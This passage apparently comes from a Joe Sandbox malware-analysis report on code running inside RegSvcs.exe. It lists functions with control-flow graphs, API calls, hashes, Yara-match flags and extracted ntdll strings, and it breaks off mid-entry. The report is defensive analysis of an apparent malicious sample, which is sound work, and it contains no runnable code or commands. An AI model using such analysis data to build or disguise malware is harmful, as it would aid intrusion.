                                                        control_flow_graph 122 42bdb3-42bdef call 404893 call 42cff3 NtClose
                                                        APIs
                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDEA
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction ID: 32c3fbc2eaf25ffa26c8e6bc6a9ff2fe44ba59d3bfffa60a7225b309ec458e0a
                                                        • Opcode Fuzzy Hash: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction Fuzzy Hash: BBE0DF722006047BC120FA5ADC01F9B735CDBC5314F00842AFA08A7181C670790087E0
                                                        Function 01662B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 136 1662b60-1662b6c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
                                                        • Instruction ID: c094ff774621442249ccdcac35c2955db6d1e2b771fcc15579f40e1bd43956a3
                                                        • Opcode Fuzzy Hash: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
                                                        • Instruction Fuzzy Hash: 1D90026120240003410575584818617400E97E0201B55C131E5014690EC5258D916225
                                                        Function 01662DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 138 1662df0-1662dfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                        • Instruction ID: 01099398d30b42247e3df16b17c272a8bb82719c0f9b863466386cdee242d7ec
                                                        • Opcode Fuzzy Hash: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                        • Instruction Fuzzy Hash: AB90023120140413D11175584908707000D97D0241F95C522A4424658ED6568E52A221
                                                        Function 01662C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 137 1662c70-1662c7c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                        • Instruction ID: 8973fd18af62722bdd88b5a23aa77d3e606dfabfa1f0fd2dadebea27c8fbdbdc
                                                        • Opcode Fuzzy Hash: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                        • Instruction Fuzzy Hash: F190023120148802D1107558880874B000997D0301F59C521A8424758EC6958D917221
                                                        Function 016635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 04ff427de91c0fb5ebcc53651d1404b52c0799689a0536d554b0d86fe7b9cbb2
                                                        • Instruction ID: adcc88ee3b730a4b697f022d5ec0c7c6909c62dee0de702fd0d024830faa3541
                                                        • Opcode Fuzzy Hash: 04ff427de91c0fb5ebcc53651d1404b52c0799689a0536d554b0d86fe7b9cbb2
                                                        • Instruction Fuzzy Hash: 1690023160550402D10075584918707100997D0201F65C521A4424668EC7958E5166A2
                                                        Function 00413CE1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 413ce1-413ce2 1 413ce4 0->1 2 413d4e 0->2 5 413d25-413d2e 1->5 6 413ce6-413cec 1->6 3 413d50-413d51 2->3 4 413da6 2->4 9 413d54-413d57 3->9 10 413da8-413da9 4->10 11 413ddf-413e2d call 42e8e3 call 417913 call 404803 call 424b93 4->11 7 413d30-413d41 5->7 8 413cf3-413cf4 5->8 6->8 13 413d70-413d71 7->13 14 413d43 7->14 16 413cf6-413cf9 8->16 17 413d0a-413d0c 8->17 15 413d58 9->15 18 413dba-413ddd call 42ded3 10->18 35 413e4d-413e53 11->35 36 413e2f-413e3e PostThreadMessageW 11->36 13->9 24 413d73-413d79 13->24 14->18 20 413d45-413d4d 14->20 22 413d59-413d68 15->22 23 413cfd-413d08 15->23 17->15 25 413d0d-413d11 17->25 18->11 20->2 22->13 23->17 27 413d15-413d23 25->27 28 413d14 25->28 27->5 28->27 36->35 37 413e40-413e4a 36->37 37->35
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 0-1592865780
                                                        • Opcode ID: eacb5baa2b6cfdd3c8b8261989c4bc8f124ec9fcbed5c2f4814ba173bd3b4392
                                                        • Instruction ID: 048fed76f797afb83908ad8893dc0dca1282d4dda37ef2dbcd98be1ab3f9ded1
                                                        • Opcode Fuzzy Hash: eacb5baa2b6cfdd3c8b8261989c4bc8f124ec9fcbed5c2f4814ba173bd3b4392
                                                        • Instruction Fuzzy Hash: 6931CC72904209BEDB018FA5EC41EDF7B3CEE45766B04425EF450A7282D3288F828BA5
                                                        Function 00413D7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 38 413d7b-413d7e 39 413d80-413da9 38->39 40 413ded-413df5 38->40 39->40 41 413dfb-413e2d call 404803 call 424b93 40->41 42 413df6 call 417913 40->42 48 413e4d-413e53 41->48 49 413e2f-413e3e PostThreadMessageW 41->49 42->41 49->48 50 413e40-413e4a 49->50 50->48
                                                        APIs
                                                        • PostThreadMessageW.USER32(30-335c-,00000111,00000000,00000000), ref: 00413E3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 1836367815-1592865780
                                                        • Opcode ID: c2a623f45fb9361cd137173174bc357b294e581cc9702b29c37b884e275eeee5
                                                        • Instruction ID: 837132a53ce44f4b1b7ac508ec9cc42e8dacc8fd16aa5aa2ab07f14575c0c31d
                                                        • Opcode Fuzzy Hash: c2a623f45fb9361cd137173174bc357b294e581cc9702b29c37b884e275eeee5
                                                        • Instruction Fuzzy Hash: 5B0189B2C04208BAC7106AA09C82EEF772CEE45710F048176B954B7201C16D4F0307F5
                                                        Function 00413DB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 51 413db6-413dd5 52 413ddd-413e2d call 42e8e3 call 417913 call 404803 call 424b93 51->52 53 413dd8 call 42ded3 51->53 63 413e4d-413e53 52->63 64 413e2f-413e3e PostThreadMessageW 52->64 53->52 64->63 65 413e40-413e4a 64->65 65->63
                                                        APIs
                                                        • PostThreadMessageW.USER32(30-335c-,00000111,00000000,00000000), ref: 00413E3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 1836367815-1592865780
                                                        • Opcode ID: 61a3df200abc970491f61343a6b98468a973e7cc42545bed0d80ea247a87058c
                                                        • Instruction ID: f0118cf9bf90cffc78d3d78335e103d8e7e68d668ba7c426319888d99f914260
                                                        • Opcode Fuzzy Hash: 61a3df200abc970491f61343a6b98468a973e7cc42545bed0d80ea247a87058c
                                                        • Instruction Fuzzy Hash: 83112972D0020CBADB11ABE19C81DEF7B7CDF44794F44805AFA04B7141D6789F068BA5
                                                        Function 00413DC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 66 413dc3-413dd5 67 413ddd-413e2d call 42e8e3 call 417913 call 404803 call 424b93 66->67 68 413dd8 call 42ded3 66->68 78 413e4d-413e53 67->78 79 413e2f-413e3e PostThreadMessageW 67->79 68->67 79->78 80 413e40-413e4a 79->80 80->78
                                                        APIs
                                                        • PostThreadMessageW.USER32(30-335c-,00000111,00000000,00000000), ref: 00413E3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 1836367815-1592865780
                                                        • Opcode ID: 1a33abe9125e22c3d9cda4ae2146027bfca8ef5ad92343d93c75efa7851675ce
                                                        • Instruction ID: d6a6efb2eefad1229f6055cd6ab6872639b162586c0850b2537da21b00a822ab
                                                        • Opcode Fuzzy Hash: 1a33abe9125e22c3d9cda4ae2146027bfca8ef5ad92343d93c75efa7851675ce
                                                        • Instruction Fuzzy Hash: A50126B2D0021CBADB01AAE19C81EEF7B7CDF44794F04806AFA04B7141D6785F068BB5
                                                        Function 0042C123 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 90 42c123-42c167 call 404893 call 42cff3 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C162
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: dfA
                                                        • API String ID: 3298025750-2195916745
                                                        • Opcode ID: 60d45fc8e91b3cb3f4a2e528d384ce29a65e96e7add9b648694c691b60e48049
                                                        • Instruction ID: 81664a15ac327da8fa3ce07262a696d6d9176a14267145b5e06273692ad50140
                                                        • Opcode Fuzzy Hash: 60d45fc8e91b3cb3f4a2e528d384ce29a65e96e7add9b648694c691b60e48049
                                                        • Instruction Fuzzy Hash: F2E06DB2204205BBD614EE99EC41EAB33ADEFC9710F444429FA08A7282C670B91087B4
                                                        Function 0042C0D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 117 42c0d3-42c117 call 404893 call 42cff3 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041E2DE,?,?,00000000,?,0041E2DE,?,?,?), ref: 0042C112
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction ID: dc71e4e836e3d7739932b3e19da150ba6b929024821e41545cd98fec97057096
                                                        • Opcode Fuzzy Hash: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction Fuzzy Hash: 5FE06DB26042457BCA10EE99EC41FDB33ADEFC9710F004429FA08A7281C6B4B91086B4
                                                        Function 0042C173 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 127 42c173-42c1af call 404893 call 42cff3 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(?,00000000,?,?,9A4A2134,?,?,9A4A2134), ref: 0042C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: a1d861fb7979714361510d997871f0d5e9f43079afdea287bcc600ae3fe074fc
                                                        • Instruction ID: e708148261a625ee2c339213655c3999ca2554bc23a574720275f2ed349581f2
                                                        • Opcode Fuzzy Hash: a1d861fb7979714361510d997871f0d5e9f43079afdea287bcc600ae3fe074fc
                                                        • Instruction Fuzzy Hash: A9E04F362006547BD620BA5ADC41F9B775DDFC5714F40842AFA0C67181C6B4790587A5
                                                        Function 01662C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 132 1662c0a-1662c0f 133 1662c11-1662c18 132->133 134 1662c1f-1662c26 LdrInitializeThunk 132->134
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
                                                        • Instruction ID: ed04d65438d043016408d079d6d25e8f8396ab6dfcbe044dfe025994d13a91ed
                                                        • Opcode Fuzzy Hash: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
                                                        • Instruction Fuzzy Hash: 16B09B719015C5C9DB51F7644E0C717790477D0701F15C175D6030751F4738C5D1E275

                                                        Non-executed Functions

                                                        Function 016A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        • Opcode ID: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
                                                        • Instruction ID: 2eed2a66f7b874528d3001fed460f260983ad90ae624c5de66e018a8a2708a28
                                                        • Opcode Fuzzy Hash: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
                                                        • Instruction Fuzzy Hash: A6929971688342ABE721CE28CC90B6BBBE9BB84754F44482DFA9597351D770EC44CF92
                                                        Function 01658620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • undeleted critical section in freed memory, xrefs: 0169542B
                                                        • corrupted critical section, xrefs: 016954C2
                                                        • Invalid debug info address of this critical section, xrefs: 016954B6
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954E2
                                                        • Address of the debug info found in the active list., xrefs: 016954AE, 016954FA
                                                        • Critical section address, xrefs: 01695425, 016954BC, 01695534
                                                        • Critical section debug info address, xrefs: 0169541F, 0169552E
                                                        • Thread identifier, xrefs: 0169553A
                                                        • 8, xrefs: 016952E3
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954CE
                                                        • Critical section address., xrefs: 01695502
                                                        • double initialized or corrupted critical section, xrefs: 01695508
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0169540A, 01695496, 01695519
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01695543
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
                                                        • Instruction ID: 8994ba9d461c7da84f86bb1280a13b37959cc491b21b28ff538c93cd1f6d9a25
                                                        • Opcode Fuzzy Hash: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
                                                        • Instruction Fuzzy Hash: A0819AB1E01358AFDF26CF99CC41BAEBBB9EB48710F10415AF506B7681D3B5A941CB60
                                                        Function 016529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016924C0
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01692498
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0169261F
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01692506
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01692412
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01692602
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01692624
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016922E4
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016925EB
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01692409
                                                        • @, xrefs: 0169259B
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        • Opcode ID: 0addbda2fce9b074ce08ffa26b08aed430abe3267155031481cd85fbcb12e3a9
                                                        • Instruction ID: 50477a5b079f1cc7fdc7de9d36a4a02eaa918015fe78191584f7f5ff1be26f50
                                                        • Opcode Fuzzy Hash: 0addbda2fce9b074ce08ffa26b08aed430abe3267155031481cd85fbcb12e3a9
                                                        • Instruction Fuzzy Hash: 480271F1D002299BDF61DB54CC90BDAB7B8AF54704F4041DEEA49A7242DB30AE85CF99
                                                        Function 016C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        • API String ID: 0-2515994595
                                                        • Opcode ID: 1e2792530a14b62722e5c21aabb334c1ab2bbd3273eecfb7868f395b19370922
                                                        • Instruction ID: 4dd67992774c87bca94494996c5272a7ec8608ba93582e4e971314c33fae4315
                                                        • Opcode Fuzzy Hash: 1e2792530a14b62722e5c21aabb334c1ab2bbd3273eecfb7868f395b19370922
                                                        • Instruction Fuzzy Hash: 3151AD725143119BD335DF188C44BBBBBECFF98A50F14491DEA9987241E770E605CB92
                                                        Function 016D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-1700792311
                                                        • Opcode ID: eaa1250881261e6ac580c6a5e7dd4f10aa2a52c2d8dfec4e771cb6ba0057a6fd
                                                        • Instruction ID: 44ac22dbe00aefd5692c418cb075a0d912af376f58072904bc4d210b271a25ea
                                                        • Opcode Fuzzy Hash: eaa1250881261e6ac580c6a5e7dd4f10aa2a52c2d8dfec4e771cb6ba0057a6fd
                                                        • Instruction Fuzzy Hash: 61D1DD35A10686DFDB22DF68C840AADBBF2FF5A720F18805DF9469B352C7749941CB14
                                                        Function 016A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016A8A3D
                                                        • AVRF: -*- final list of providers -*- , xrefs: 016A8B8F
                                                        • VerifierFlags, xrefs: 016A8C50
                                                        • VerifierDlls, xrefs: 016A8CBD
                                                        • VerifierDebug, xrefs: 016A8CA5
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016A8A67
                                                        • HandleTraces, xrefs: 016A8C8F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        • API String ID: 0-3223716464
                                                        • Opcode ID: f9b51af734a1837f3bee85562cc6d9e22a31951cf80dc929e7e67eff0eabbdda
                                                        • Instruction ID: 48a7302cf29a48ba59118e43c03b7e11610c999f4981a013c636d59cef2a29e5
                                                        • Opcode Fuzzy Hash: f9b51af734a1837f3bee85562cc6d9e22a31951cf80dc929e7e67eff0eabbdda
                                                        • Instruction Fuzzy Hash: 539156B2645302AFD326EF6CCC90B5BBBE9AB95724F84445CFA426B240C7709D01CF99
                                                        Function 016563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        • Opcode ID: 76746f02d1e4142bd119b802e9892be6deebcaa499b140034f286a70b4244438
                                                        • Instruction ID: ee014a96e8cb5ad270e7316f341e71a211a805a4ece796aca13e4a4a7b885772
                                                        • Opcode Fuzzy Hash: 76746f02d1e4142bd119b802e9892be6deebcaa499b140034f286a70b4244438
                                                        • Instruction Fuzzy Hash: EC914770B013129BDF39DF58DD94BAA7BAABF41B34F40816CE9016B385DB709842C794
                                                        Function 0161645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01679A11, 01679A3A
                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01679A2A
                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01679A01
                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016799ED
                                                        • apphelp.dll, xrefs: 01616496
                                                        • LdrpInitShimEngine, xrefs: 016799F4, 01679A07, 01679A30
                                                        Memory Dump Source
